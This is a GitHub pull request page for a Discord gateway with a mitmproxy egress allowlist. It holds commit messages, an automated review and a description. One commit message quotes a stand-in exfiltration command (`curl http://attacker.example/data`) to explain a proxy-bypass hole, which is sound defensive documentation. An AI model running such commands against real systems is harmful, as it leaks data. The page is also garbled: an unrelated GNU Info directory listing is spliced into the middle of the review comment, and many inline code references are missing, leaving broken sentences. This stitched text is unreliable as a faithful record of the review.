Establishes the v1 deploy surface: gateway daemon + workspace placeholder + mitmproxy as forward proxy for outbound TLS. The workspace HTTP API is a placeholder; Unit 7 implements it. deploy/compose.yaml: - gateway: built from gateway.Dockerfile, secrets bind-mounted at /run/secrets/ (DISCORD_TOKEN_FILE, DISCORD_APPLICATION_ID_FILE, S3_BUCKET_FILE, S3_REGION_FILE, S3_ENDPOINT_FILE), HTTPS_PROXY pointed at mitmproxy, NODE_EXTRA_CA_CERTS=/etc/ssl/certs/mitmproxy-ca-cert.pem - workspace: idle placeholder (sleep infinity) — Unit 7 owns the real build - mitmproxy/mitmproxy:11.0.2 running mitmdump -s allowlist.py - named volume mitmproxy-certs shared between mitmproxy (writes CA) and gateway/workspace (reads CA for trust) deploy/mitmproxy/allowlist.py: blocks every CONNECT outside the allowlist (GitHub API, npm registry, S3/R2, Discord gateway, Anthropic + OpenAI + Google generative APIs). Wildcard suffix matching (*.s3.amazonaws.com). Structured log on every block decision. deploy/gateway.Dockerfile: node:24-alpine multi-stage build with corepack + pnpm, builds @fro-bot/runtime then @fro-bot/gateway; runtime stage copies only node_modules + dists. deploy/workspace.Dockerfile: placeholder that builds an idle container so the compose stack composes cleanly. OpenCode 1.14.41 + oMo + Systematic pinning lives here when Unit 7 replaces it. deploy/init-certs.sh: idempotent CA bootstrap into mitmproxy-certs volume. deploy/validate-stack.sh: smoke test (compose config + ps + logs tail). deploy/README.md: operator setup notes. deploy/compose.override.example.yaml: dev override template (mitmproxy web UI, debug log level). .gitignore: ignore deploy/secrets/ and deploy/compose.override.yaml (not the .example). Part of Unit 4 (sub-unit 4f) in docs/plans/2026-04-18-001-feat-fro-bot-gateway-discord-v1-plan.md.
Addresses PR #635 review feedback and resolves Dependency Review CI failure. Single fix commit on top of the rebased Unit 4 branch. CI fix: - Bump effect 3.18.4 -> 3.21.2 to clear GHSA-38f7-945m-qr2g (high, AsyncLocalStorage context loss under concurrent RPC load). Blocking review items: - compose.yaml: mitmproxy now exposes a healthcheck that fails until ~/.mitmproxy/mitmproxy-ca-cert.pem exists in the shared volume; the gateway and workspace services use depends_on.condition: service_healthy so they cannot start before the CA is written. Closes the boot-window TLS-bypass hole (Node silently ignores a missing NODE_EXTRA_CA_CERTS path). - discord/commands/index.ts: dispatchCommand now sends an ephemeral interaction.reply BEFORE failing the Effect on unknown command. Discord drops the interaction token after 3s without an ack — without this fix a stale global command or cross-bot interaction surfaced as 'This interaction failed'. The ack itself uses Effect.catchAll so an ack-rejection (e.g. token already expired) does not mask the original unknown-command error. - discord/client.ts + commands/index.ts: removed the _pendingToken stash on the Discord.js Client. registerSlashCommands now takes 'token' as a plain parameter — main.ts already has it via config.discordToken. This removes the coupling on a third-party private field and the implicit ordering constraint between createDiscordClient and registerSlashCommands. Non-blocking review items: - mitmproxy/allowlist.py: removed redundant flow.kill() after setting flow.response (mitmproxy short-circuits the CONNECT once response is set). Documented intentional apex-match wildcard semantics. Dropped unused 're' import. - shutdown.ts: added 'shuttingDown' guard so SIGTERM + SIGINT arriving in quick succession do not race two concurrent destroy chains. The ignored signal is logged at debug so operators can see what happened. Tests: - commands/index.test.ts: replaced the bare unknown-command assertion with one that also verifies the ephemeral reply payload. Added a second test covering the ack-failure path so the original error wins. - shutdown.test.ts: added a double-signal test that emits SIGTERM and SIGINT in succession and asserts only one destroy, one clean exit, and one ignored-signal debug log. Verification: 1463/1463 tests pass across the workspace (72/72 gateway), 0 lint errors, 0 type errors, build clean.
5 P3 findings surfaced by a 9-reviewer ce:review autofix pass on this
PR after the prior fix sweep landed. All applied via a single fixer.
Changes:
- client.ts: dropped dead _token parameter from createDiscordClient now
that the _pendingToken stash is gone; updated caller in main.ts and
the 4 call sites in client.test.ts. Signature is now
createDiscordClient(options: DiscordClientOptions = {}).
- runtime-effect.ts: added readonly modifier to CoordinationLogger
properties to match the project-wide "readonly interfaces" convention.
- shutdown.test.ts: added BDD comments (#given, #then) to the
default-drain-ms test so it matches the rest of the file's style.
- packages/gateway/AGENTS.md: trimmed the Effect surface description
to actually-used APIs (Effect.gen, tryPromise, fail, succeed,
runPromise, either, void, catchAll); marked Schedule and Schema
as planned-for-Unit-6+ instead of present.
- main.ts: routed debug and info log levels through console.log with
scoped // eslint-disable-next-line no-console annotations, instead
of misclassifying them as warnings. warn and error keep their
appropriate channels. Closes the gap from Fro Bot's prior non-blocking
concern that the first fix sweep missed.
Residual review work (P1 + P2, 11 items) is captured in
.context/systematic/ce-review/20260517-012542-4055909e/run-summary.md.
None of those are applied here — they require human decisions
(allowlist scoping) or larger test additions (mitmproxy pytest) and
belong in a follow-up reliability/security hardening PR.
Verification: 1463/1463 tests, 0 lint errors, 0 type errors, build clean.
Two P1 security findings from the ce:review pass, both with cross-reviewer convergence (correctness + security flagged the first independently at 0.91/0.88 confidence). Closes the gap that would have shipped a coherent- looking sandbox with a real plain-HTTP escape hatch. Plain HTTP bypass: - AllowlistAddon previously implemented only http_connect, which fires on HTTPS CONNECT tunnels. Plain HTTP requests through HTTP_PROXY (configured in deploy/compose.yaml) flow through the mitmproxy 'request' hook, which had zero allowlist enforcement. A workspace container could `curl http://attacker.example/data` and bypass the entire egress boundary. - Added a request(flow) method mirroring http_connect: same allowlist check, same 403 short-circuit, same structured log format. Both hooks now enforce the same policy across HTTPS and HTTP. Object-store wildcard scoping: - Removed `*.s3.amazonaws.com` and `*.r2.cloudflarestorage.com` from the static allowlist. These wildcards permitted egress to any attacker-controlled bucket in either cloud — the data-exfiltration defense the mitmproxy layer was supposed to provide didn't apply to the very service most likely to be used for exfiltration. - Added OBJECT_STORE_HOSTS env var (comma-separated host list) parsed at module import time and merged with the static allowlist. The operator names the exact bucket host(s) used by their deployment. Empty/unset → no S3/R2 traffic at all (fail-closed). - Wired through deploy/compose.yaml (mitmproxy service) and compose.override.example.yaml; documented in deploy/README.md. Tests (deploy/mitmproxy/test_allowlist.py, new): - 20 pytest cases covering _is_allowed (exact, wildcard apex/subdomain, case normalization, non-match, empty list), OBJECT_STORE_HOSTS env parsing (set/empty/whitespace), http_connect (allow/block), and request (allow/block/no-kill/S3-blocked-without-env/S3-allowed-with-env). - Self-contained: mocks `mitmproxy.http` via sys.modules so the test file runs without the mitmproxy package installed. Includes a __main__ runner for environments without pytest. - No Python tooling added to CI in this PR — the test file is manually runnable with `python3 deploy/mitmproxy/test_allowlist.py`. .gitignore: - Added deploy/mitmproxy/.gitignore for Python __pycache__/*.pyc. Verification: 20/20 Python tests, 72/72 gateway TS tests, 1463/1463 workspace tests, lint/types/build clean, compose config validates.
4 findings surfaced by a 5-reviewer ce:review pass on the hardening commit (dceff0c), all bounded autofix scope. Most importantly fixes a P1 footgun in the override example file that would have silently broken the OBJECT_STORE_HOSTS env interpolation for anyone using the override. Changes: - compose.override.example.yaml: the example file set `OBJECT_STORE_HOSTS: ""` which OVERRIDES the base interpolation `${OBJECT_STORE_HOSTS:-}` from compose.yaml. Anyone using the override file with `.env`-supplied values would get silently empty values. Replaced with a commented-out block explaining fall-through behavior. - allowlist.py: extracted `_enforce(flow, kind)` helper from the near-identical `http_connect` and `request` methods. Both methods now delegate to one source of truth — no drift risk between HTTPS-tunnel and plain-HTTP allowlist enforcement. - test_allowlist.py: added `_reset_response_mock()` helper and called it at the top of every hook test. ALLOWED cases now assert `Response.make.assert_not_called()`; BLOCKED cases use `assert_called_once_with()`. Closes a stale-mock false-pass risk where one test's allow/block decision could leak into the next test's assertion. - test_allowlist.py: `__main__` runner now dynamically discovers tests via `globals()` filter. New tests added to the file no longer get silently skipped when the hardcoded list isn't updated. Residual P1+P2 from round 2 captured in .context/systematic/todos/{015,016}-*.md: - 015: OBJECT_STORE_HOSTS case + port normalization (P2) - 016: reject wildcards in OBJECT_STORE_HOSTS (P1 — same blast radius as the original fix, but blocked by env config rather than code) These are sized for a focused follow-up PR after #635 lands. Verification: 20/20 Python tests, 72/72 gateway TS tests, 1463/1463 workspace, compose config validates, lint/types/build clean.
marcusrbrown
force-pushed
the
feat/gateway-v1-unit-4
branch
from
b5f1489 to
094f3c1
Compare
fro-bot
approved these changes
May 17, 2026
Owner
fro-bot
left a comment
fro-bot
left a comment
There was a problem hiding this comment.
Verdict: PASS
All three blocking issues from the previous review are resolved. This is ready to merge.
Blocking issues
None — all three have been addressed:
-
mitmproxy CA race on first boot — now uses on the mitmproxy , backed by a healthcheck that gates on actually existing in the volume. Workspace also upgraded to . The comment in the compose file explains the exact failure mode that was prevented.
-
Unknown command leaving interaction unacknowledged — now sends an ephemeral reply with the unknown command name before failing the Effect. The ack-failure is swallowed so the outer caller still sees the original error. Tests cover both the happy ack path and the expired-token path where itself rejects.
-
** stash** — no longer accepts a token argument, now takes an explicit parameter, and passes directly. The hidden coupling is gone.
Non-blocking concerns
- plain-HTTP bypass was also closed ( hook added alongside ), and the broad S3/R2 wildcards were replaced with an operator-supplied env var (fail-closed default). Both are improvements beyond the scope of the original review — good catches.
- Wildcard semantics for bare apex domains are now documented inline in .
- removed; the comment explains why.
- now correctly routes /File: dir, Node: Top This is the top of the INFO tree
This (the Directory node) gives a menu of major topics.
Typing "q" exits, "H" lists all Info commands, "d" returns here,
"h" gives a primer for first-timers,
"mEmacs" visits the Emacs manual, etc.
In Emacs, you can click mouse button 2 on a menu item or cross reference
to select it.
- Menu:
Basics
- Common options: (coreutils)Common options.
- Coreutils: (coreutils). Core GNU (file, text, shell) utilities.
- Date input formats: (coreutils)Date input formats.
- Ed: (ed). The GNU line editor
- File permissions: (coreutils)File permissions.
Access modes. - Finding files: (find). Operating on files matching certain criteria.
- Time: (time). time
Compression
- Gzip: (gzip). General (de)compression of files (lzw).
Development
- libffi: (libffi). Portable foreign function interface library.
Editors
- nano: (nano). Small and friendly text editor.
General Commands
- Screen: (screen). Full-screen window manager.
GNU organization
- Maintaining Findutils: (find-maint).
Maintaining GNU findutils
GNU Utilities
- dirmngr-client: (gnupg). X.509 CRL and OCSP client.
- dirmngr: (gnupg). X.509 CRL and OCSP server.
- gpg-agent: (gnupg). The secret key daemon.
- gpg2: (gnupg). OpenPGP encryption and signing tool.
- gpgsm: (gnupg). S/MIME encryption and signing tool.
Individual utilities
- aclocal-invocation: (automake-1.16)aclocal Invocation.
Generating aclocal.m4. - arch: (coreutils)arch invocation. Print machine hardware name.
- automake-invocation: (automake-1.16)automake Invocation.
Generating Makefile.in. - b2sum: (coreutils)b2sum invocation. Print or check BLAKE2 digests.
- base32: (coreutils)base32 invocation. Base32 encode/decode data.
- base64: (coreutils)base64 invocation. Base64 encode/decode data.
- basename: (coreutils)basename invocation. Strip directory and suffix.
- basenc: (coreutils)basenc invocation. Encoding/decoding of data.
- cat: (coreutils)cat invocation. Concatenate and write files.
- chcon: (coreutils)chcon invocation. Change SELinux CTX of files.
- chgrp: (coreutils)chgrp invocation. Change file groups.
- chmod: (coreutils)chmod invocation. Change access permissions.
- chown: (coreutils)chown invocation. Change file owners and groups.
- chroot: (coreutils)chroot invocation. Specify the root directory.
- cksum: (coreutils)cksum invocation. Print POSIX CRC checksum.
- cmp: (diffutils)Invoking cmp. Compare 2 files byte by byte.
- comm: (coreutils)comm invocation. Compare sorted files by line.
- cp: (coreutils)cp invocation. Copy files.
- csplit: (coreutils)csplit invocation. Split by context.
- cut: (coreutils)cut invocation. Print selected parts of lines.
- date: (coreutils)date invocation. Print/set system date and time.
- dd: (coreutils)dd invocation. Copy and convert a file.
- df: (coreutils)df invocation. Report file system usage.
- diff3: (diffutils)Invoking diff3. Compare 3 files line by line.
- diff: (diffutils)Invoking diff. Compare 2 files line by line.
- dir: (coreutils)dir invocation. List directories briefly.
- dircolors: (coreutils)dircolors invocation. Color setup for ls.
- dirname: (coreutils)dirname invocation. Strip last file name component.
- du: (coreutils)du invocation. Report file usage.
- echo: (coreutils)echo invocation. Print a line of text.
- env: (coreutils)env invocation. Modify the environment.
- expand: (coreutils)expand invocation. Convert tabs to spaces.
- expr: (coreutils)expr invocation. Evaluate expressions.
- factor: (coreutils)factor invocation. Print prime factors
- false: (coreutils)false invocation. Do nothing, unsuccessfully.
- find: (find)Invoking find. Finding and acting on files.
- fmt: (coreutils)fmt invocation. Reformat paragraph text.
- fold: (coreutils)fold invocation. Wrap long input lines.
- groups: (coreutils)groups invocation. Print group names a user is in.
- gunzip: (gzip)Overview. Decompression.
- gzexe: (gzip)Overview. Compress executables.
- head: (coreutils)head invocation. Output the first part of files.
- hostid: (coreutils)hostid invocation. Print numeric host identifier.
- hostname: (coreutils)hostname invocation. Print or set system name.
- id: (coreutils)id invocation. Print user identity.
- install: (coreutils)install invocation. Copy files and set attributes.
- join: (coreutils)join invocation. Join lines on a common field.
- kill: (coreutils)kill invocation. Send a signal to processes.
- link: (coreutils)link invocation. Make hard links between files.
- ln: (coreutils)ln invocation. Make links between files.
- locate: (find)Invoking locate. Finding files in a database.
- logname: (coreutils)logname invocation. Print current login name.
- ls: (coreutils)ls invocation. List directory contents.
- md5sum: (coreutils)md5sum invocation. Print or check MD5 digests.
- mkdir: (coreutils)mkdir invocation. Create directories.
- mkfifo: (coreutils)mkfifo invocation. Create FIFOs (named pipes).
- mknod: (coreutils)mknod invocation. Create special files.
- mktemp: (coreutils)mktemp invocation. Create temporary files.
- mv: (coreutils)mv invocation. Rename files.
- nice: (coreutils)nice invocation. Modify niceness.
- nl: (coreutils)nl invocation. Number lines and write files.
- nohup: (coreutils)nohup invocation. Immunize to hangups.
- nproc: (coreutils)nproc invocation. Print the number of processors.
- numfmt: (coreutils)numfmt invocation. Reformat numbers.
- od: (coreutils)od invocation. Dump files in octal, etc.
- paste: (coreutils)paste invocation. Merge lines of files.
- patch: (diffutils)Invoking patch. Apply a patch to a file.
- pathchk: (coreutils)pathchk invocation. Check file name portability.
- pr: (coreutils)pr invocation. Paginate or columnate files.
- printenv: (coreutils)printenv invocation. Print environment variables.
- printf: (coreutils)printf invocation. Format and print data.
- ptx: (coreutils)ptx invocation. Produce permuted indexes.
- pwd: (coreutils)pwd invocation. Print working directory.
- readlink: (coreutils)readlink invocation. Print referent of a symlink.
- realpath: (coreutils)realpath invocation. Print resolved file names.
- rm: (coreutils)rm invocation. Remove files.
- rmdir: (coreutils)rmdir invocation. Remove empty directories.
- runcon: (coreutils)runcon invocation. Run in specified SELinux CTX.
- sdiff: (diffutils)Invoking sdiff. Merge 2 files side-by-side.
- seq: (coreutils)seq invocation. Print numeric sequences
- sha1sum: (coreutils)sha1sum invocation. Print or check SHA-1 digests.
- sha2: (coreutils)sha2 utilities. Print or check SHA-2 digests.
- shred: (coreutils)shred invocation. Remove files more securely.
- shuf: (coreutils)shuf invocation. Shuffling text files.
- sleep: (coreutils)sleep invocation. Delay for a specified time.
- sort: (coreutils)sort invocation. Sort text files.
- split: (coreutils)split invocation. Split into pieces.
- stat: (coreutils)stat invocation. Report file(system) status.
- stdbuf: (coreutils)stdbuf invocation. Modify stdio buffering.
- stty: (coreutils)stty invocation. Print/change terminal settings.
- sum: (coreutils)sum invocation. Print traditional checksum.
- sync: (coreutils)sync invocation. Sync files to stable storage.
- tac: (coreutils)tac invocation. Reverse files.
- tail: (coreutils)tail invocation. Output the last part of files.
- tee: (coreutils)tee invocation. Redirect to multiple files.
- test: (coreutils)test invocation. File/string tests.
- timeout: (coreutils)timeout invocation. Run with time limit.
- touch: (coreutils)touch invocation. Change file timestamps.
- tr: (coreutils)tr invocation. Translate characters.
- true: (coreutils)true invocation. Do nothing, successfully.
- truncate: (coreutils)truncate invocation. Shrink/extend size of a file.
- tsort: (coreutils)tsort invocation. Topological sort.
- tty: (coreutils)tty invocation. Print terminal name.
- uname: (coreutils)uname invocation. Print system information.
- unexpand: (coreutils)unexpand invocation. Convert spaces to tabs.
- uniq: (coreutils)uniq invocation. Uniquify files.
- unlink: (coreutils)unlink invocation. Removal via unlink(2).
- updatedb: (find)Invoking updatedb. Building the locate database.
- uptime: (coreutils)uptime invocation. Print uptime and load.
- users: (coreutils)users invocation. Print current user names.
- vdir: (coreutils)vdir invocation. List directories verbosely.
- wc: (coreutils)wc invocation. Line, word, and byte counts.
- who: (coreutils)who invocation. Print who is logged in.
- whoami: (coreutils)whoami invocation. Print effective user ID.
- xargs: (find)Invoking xargs. Operating on many files.
- yes: (coreutils)yes invocation. Print a string indefinitely.
- zcat: (gzip)Overview. Decompression to stdout.
- zdiff: (gzip)Overview. Compare compressed files.
- zforce: (gzip)Overview. Force .gz extension on files.
- zgrep: (gzip)Overview. Search compressed files.
- zmore: (gzip)Overview. Decompression output by pages.
Kernel
- GRUB: (grub). The GRand Unified Bootloader
- grub-dev: (grub-dev). The GRand Unified Bootloader Dev
- grub-install: (grub)Invoking grub-install.
Install GRUB on your drive - grub-mkconfig: (grub)Invoking grub-mkconfig.
Generate GRUB configuration - grub-mkpasswd-pbkdf2: (grub)Invoking grub-mkpasswd-pbkdf2.
- grub-mkrelpath: (grub)Invoking grub-mkrelpath.
- grub-mkrescue: (grub)Invoking grub-mkrescue.
Make a GRUB rescue image - grub-mount: (grub)Invoking grub-mount.
Mount a file system using GRUB - grub-probe: (grub)Invoking grub-probe.
Probe device information - grub-script-check: (grub)Invoking grub-script-check.
Libraries
- RLuserman: (rluserman). The GNU readline library User's Manual.
Math
- bc: (bc). An arbitrary precision calculator language.
Network applications
- Wget: (wget). Non-interactive network downloader.
Programming
- flex: (flex). Fast lexical analyzer generator (lex
replacement).
Software development
- Automake: (automake-1.16). Making GNU standards-compliant Makefiles.
- Automake-history: (automake-history).
History of Automake development.
Texinfo documentation system
- info stand-alone: (info-stnd).
Read Info documents without Emacs. - install-info: (texinfo)Invoking install-info.
Update info/dir entries. - makeinfo: (texinfo)Invoking texi2any.
Translate Texinfo source. - pdftexi2dvi: (texinfo)PDF Output.
PDF output for Texinfo. - pod2texi: (pod2texi)Invoking pod2texi.
Translate Perl Pod to Texinfo. - texi2any: (texinfo)Invoking texi2any.
Translate Texinfo source. - texi2any customization: (texi2any_api).
Customizing texi2any output - texi2any modules: (texi2any_internals).
Texinfo Perl modules used in texi2any - texi2dvi: (texinfo)Format with texi2dvi.
Print Texinfo documents. - texi2pdf: (texinfo)PDF Output.
PDF output for Texinfo. - texindex: (texinfo)Format with tex/texindex.
Sort Texinfo index files. - Texinfo: (texinfo). The GNU documentation format.
Text creation and manipulation
- Diffutils: (diffutils). Comparing and merging files.
- M4: (m4). A powerful macro processor.
- grep: (grep). Print lines that match patterns.
- sed: (sed). Stream EDitor. to with scoped comments.
- Double-exit race is closed with the guard; the test for rapid SIGTERM+SIGINT succession is in place.
Missing tests
None — all tests requested in the previous review were added:
- Ephemeral reply on unknown command (including the expired-token edge case).
- Duplicate-signal idempotency for the shutdown handler.
- added for the Python allowlist logic.
Risk assessment (LOW)
The changes are targeted fixes with good test coverage. The Effect/Result boundary, the Docker stack architecture, and the core Discord integration are all unchanged from the already-reviewed skeleton. No new external surfaces introduced.
Run Summary
| Field | Value |
|---|---|
| Event | pull_request |
| Repository | fro-bot/agent |
| Run ID | 25986472337 |
| Cache | hit |
| Session | ses_1cb177d37ffeWExM4ScTjO7bhq |
marcusrbrown
added a commit
that referenced
this pull request
May 17, 2026
…healthcheck (#638) * fix(gateway): security closeout — wildcard rejection, normalization, healthcheck 3 ready todos from PR #635's ce:review bundled into one focused PR: todo 016 (P1), todo 015 (P2), todo 010 (P2). All deploy/-only. Todo 016 (P1) — Reject wildcards in OBJECT_STORE_HOSTS: The env var that scopes mitmproxy's S3/R2 allowlist accepted wildcard entries unchecked. An operator (or attacker with deploy-config access) could set OBJECT_STORE_HOSTS="*.s3.amazonaws.com" and silently re- introduce the same over-broad-allowlist hole that PR #635 fixed. Same blast radius, different surface. Added _is_valid_hostname() RFC 1123 helper. Validation now raises ValueError at module import time (mitmproxy fails-fast on bad config) when an entry: - starts with "*." (wildcard) — message names the entry and explains the security rationale - fails hostname validation (1-253 chars, allowed [a-z 0-9 . -], label rules) Todo 015 (P2) — Normalize OBJECT_STORE_HOSTS entries: Two real misconfigurations slipped through the previous parser: 1. Uppercase entries never matched because _is_allowed lowercases the request host but not the allowlist entries. 2. Entries with ports (e.g. "localhost:9000" for MinIO) never matched because flow.request.host inclusion of port depends on mitmproxy version and proxy mode — ambiguous. Hybrid fix: normalize case (operator-friendly, just .lower() the entry), but reject ports at startup (genuine ambiguity — operator must know whether mitmproxy will see the port). Validation order is now: empty-skip → wildcard-reject → port-reject → hostname-validate → lowercase-normalize → append. Todo 010 (P2) — Gateway cert-readability healthcheck: The Docker healthcheck was [CMD, node, -e, process.exit(0)] which passes unconditionally. If mitmproxy's cert volume gets corrupted or unmounted after gateway startup, the gateway has no signal — the operator's only feedback is failed requests. Replaced with [CMD-SHELL, "test -r /etc/ssl/certs/mitmproxy-ca-cert.pem"] which verifies the CA cert is readable. If the cert disappears the gateway transitions to unhealthy and Docker's restart policy can act. The deeper TCP-probe option (nc against mitmproxy:8080) is deferred to a future pass per the todo's scope_decision frontmatter. Tests: - deploy/mitmproxy/test_allowlist.py: +6 tests covering all validation paths (wildcard apex/subdomain, invalid hostname, valid bucket, uppercase normalization, port rejection) Verification: 26/26 Python tests (was 20, +6), 72/72 gateway TS, 1463+ workspace, lint/types/build clean, compose config validates. * chore(gateway): apply ce:review safe_auto fixes on security closeout 3 P2 findings from a 3-reviewer ce:review pass on the security closeout (commit f61a463). All bounded, all in deploy/. Changes: - allowlist.py _is_valid_hostname: explicitly reject leading-dot, trailing-dot, and consecutive-dots BEFORE the per-label loop. Previously rstrip('.') was silently normalizing trailing dots and the empty-label check missed leading dots — `.example.com`, `example.com.`, and `example..com` all incorrectly returned True. - compose.yaml gateway healthcheck: tightened test -r to test -s so a zero-byte CA cert file (mid-write corruption, mount issue) also triggers unhealthy state. Catches the case where the file exists but isn't a valid cert. - test_allowlist.py: tightened error-message assertions on the wildcard and invalid-hostname rejection tests so they pin the operator-actionable guidance text ("Set exact bucket hostnames", the entry name), not just the type or a partial word. A future refactor that swallows the actionable guidance can't slip through. - test_allowlist.py: +3 new tests for the hostname-validator edge cases (leading dot, trailing dot, consecutive dots). Residual: todo 017 (P3, IP literal decision) captures the residual risk that OBJECT_STORE_HOSTS accepts private/loopback/metadata-service IPs. Deferred to PR B (reliability) since deploy-config is already a trust boundary and the MinIO use case wants IP support. Verification: 29/29 Python tests (was 26, +3), 72/72 gateway TS, lint/types/build clean, compose config validates. * fix(gateway): address Fro Bot review on #638 — IP literal docs + IPv6 clarity 1 blocking + 3 non-blocking items from Fro Bot's CHANGES_REQUESTED. All documentation/clarity fixes; no behavior changes to validation logic beyond a sharper IPv6 error message. Blocking — IP literal acceptance is now visible in code: The OBJECT_STORE_HOSTS validation accepts IPv4 literals because RFC 1123 labels permit pure digits. That's a deliberate choice (MinIO/self-hosted object-store use case), and the residual risk (metadata-service IPs 169.254.169.254 reachable if deploy-config is compromised) is accepted on deploy-config-trust grounds. Previously this rationale lived only in the local todo 017 — invisible to anyone reading the code. Added an inline comment at the validator call site that cites the MinIO case, names the accepted risk, and points to the todo for the deferred tightening decision. Non-blocking 1 — Wildcard asymmetry comment: The static ALLOWLIST permits *.discord.com / *.discord.gg / etc. The OBJECT_STORE_HOSTS env-var path rejects ANY wildcard entry. Future readers wondering about the inconsistency now see the explanation inline: wildcards in code go through review; wildcards via env var would let operators (or attackers with deploy-config access) silently re-introduce over-broad allowlist holes. Non-blocking 2 — IPv6 port-reject message clarity: OBJECT_STORE_HOSTS=::1 was rejected by the port-reject branch because it contains a colon, but the error message said "contains a port" — wrong for IPv6. Split the port-reject step into two arms: if the entry looks like IPv6 (multiple colons OR leading [), raise an IPv6-specific message; otherwise the original port message. IPv6 is still rejected (not yet supported) but the diagnostic is now accurate. Non-blocking 3 — Test documenting current IPv4 acceptance: Added test_object_store_hosts_accepts_ipv4_literal that captures the deliberate choice to accept 10.0.0.5 etc. and references todo 017. An accidental future refactor that rejects IPv4 will now break a test with a clear docstring explaining why the behavior matters. Also added test_object_store_hosts_rejects_ipv6_literal to confirm the new branch fires and emits an IPv6-specific error message. Verification: 31/31 Python tests (was 29, +2), 72/72 gateway TS, lint/types/build clean, compose config validates.
This was referenced May 17, 2026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Implements Unit 4 of the Fro Bot Gateway v1 plan: a Discord-facing gateway daemon scaffold, the Effect/Result boundary, and a 3-service Compose stack with mitmproxy enforcing an egress allowlist.
Commits (one per sub-unit):
00623ff— Package skeleton (package.json, tsconfig, tsdown.config, AGENTS.md, placeholder main.ts)2c86ca7— Effect adapter for@fro-bot/runtimeasync-Result functions (runtime-effect.ts)921f169— Env + secret loading (config.tswithreadSecretDocker-secrets-first precedence)486bed1— Discord client +/fro-bot pingslash command + mention handler67fc056— Real main entry + SIGTERM drain handlers585f5e6— Docker Compose stack with mitmproxy egress allowlistSurface:
/fro-bot ping(guild-scoped whenDISCORD_GUILD_IDis set, global otherwise), responds to@-mentionsby creating a thread and replying.allowedMentions: { parse: ['users'], repliedUser: false }is locked at client construction; @everyone / @here cannot fire.client.destroy()within 25s default drain, force exit 1 on timeout.@fro-bot/runtimestays onResult<T, E>. The single boundary isruntime-effect.ts.Deploy stack (
deploy/):compose.yaml: gateway + workspace + mitmproxy with shared CA volumeinit-certs.sh+validate-stack.shoperator scriptsVerification:
pnpm --filter @fro-bot/gateway test: 70/70 pass across 7 test filespnpm --filter @fro-bot/gateway lint: cleanpnpm --filter @fro-bot/gateway check-types: cleandocker compose -f deploy/compose.yaml config: validatesOut of scope (later units):
/fro-bot runcommand (Unit 6)/fro-bot add-project(Unit 5)